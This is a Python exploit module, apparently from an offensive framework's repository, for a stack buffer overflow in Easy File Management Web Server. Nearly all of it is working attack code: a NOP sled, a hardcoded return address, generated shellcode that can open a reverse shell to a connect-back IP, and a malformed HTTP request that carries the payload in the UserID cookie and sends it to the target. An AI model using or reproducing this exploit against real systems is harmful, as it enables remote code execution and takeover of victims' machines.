Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
130 lines (116 sloc) 4.11 KB
#!/usr/bin/python
# -*- coding: utf-8 -*-
# The exploit is a part of Agora pack - use only under the license agreement
# specified in LICENSE.txt in your Agora distribution
import sys
import socket
sys.path.append("./core")
sys.path.append("./shellcodes")
from Sploit import Sploit
from shellcodes.Shellcodes import OSShellcodes
INFO = {}
INFO['NAME'] = "ef_easyfile_webserver_sbo"
INFO['DESCRIPTION'] = "Easy File Management Web Server Stack Buffer Overflow"
INFO['VENDOR'] = "http://www.sharing-file.com/"
INFO["CVE Name"] = "N/A"
INFO["NOTES"] = """
Stack buffer overflow
Tested on win xp sp2 32 bit, Tested on Windows 7 64 bit
"""
INFO['CHANGELOG'] = "14 July, 2015. Written by Gleg team."
INFO['PATH'] = "Exploits/"
# Must be in every module, to be set by framework
OPTIONS = {}
OPTIONS["HOST"] = "192.168.153.140"
OPTIONS["PORT"] = "80"
OPTIONS["CONNECTBACK IP"] = "192.168.153.1"
OPTIONS["CLOUD GENERATE"] = False
class exploit(Sploit):
def __init__(self, logger=None):
Sploit.__init__(self, logger=logger, options=OPTIONS)
self.name = INFO['NAME']
return
def create_shellcode(self):
self.log("[] Generate shellcode started")
badstring = ["\x00", "\x3B"]
ip = self.connectback_ip
port = 5555
shellcode_type = 'command'
if self.args['listener']:
port = int(self.args['listener']['PORT'])
shellcode_type = 'reverse'
os_target = "WINDOWS"
os_arch = '32bit'
s = OSShellcodes(os_target, os_arch, ip, port, badstring)
# if cloud_generate True we send request to our shell
# cloud generate server and recieve generating and base64 encoded
# shellcode in create_shellcode shellcode will be decoded and you
# recieve normal shell. Cloud shell server ip you can specify in
# config.py file in root directory of East framework
shellcode = s.create_shellcode(
shellcode_type,
encode=1,
debug=1,
cloud_generate=self.cloud_generate
)
for i in badstring:
if i in shellcode:
print("FOUND BAD SYMBOL")
return shellcode if shellcode else False
def exploit(self):
self.log("exploit run")
shellcode = self.create_shellcode()
if not shellcode:
self.log("shellcode can't create")
return False
self.log("shellcode created")
payload = "\x90" * 64
payload += "\x90\x90\xEB\x1F"
payload += "\xF2\x95\x01\x10"
# ImageLoad.dll
payload += "\x90" * 20
payload += "\x90" * 8
payload += "\x90" * 4
payload += shellcode
payload += "\x90" * (1500 - len(payload))
buf = "GET /vfolder.ghp HTTP/1.1\r\n"
buf += "User-Agent: Mozilla/4.0\r\n"
buf += "Host:" + self.host + ":" + str(self.port) + "\r\n"
buf += "Accept: text/html,application/xhtml+xml,"
buf += "application/xml;q=0.9,*/*;q=0.8\r\n"
buf += "Accept-Language: en-us\r\n"
buf += "Accept-Encoding: gzip, deflate\r\n"
buf += "Referer: http://" + self.host + "/\r\n"
buf += "Cookie: SESSIONID=1337; UserID=%s; PassWD=;\r\n"
buf += "Conection: Keep-Alive\r\n\r\n"
buf = str(buf) % payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((self.host, int(self.port)))
self.log("[*] Connected to " + self.host + "!")
except Exception as e:
self.log(e)
self.log("[!] " + self.host + " didn't respond")
return False
self.log("[*] Sending malformed request...")
s.send(buf)
self.log("[!] Exploit has been sent!")
s.close()
return True
def run(self):
if self.exploit():
self.finish(True)
return 1
else:
self.finish(False)
return 0
if __name__ == '__main__':
"""
By now we only have the tool
mode for exploit..
Later we would have
standalone mode also.
"""
print "Running exploit %s .. " % INFO['NAME']
e = exploit()
e.run()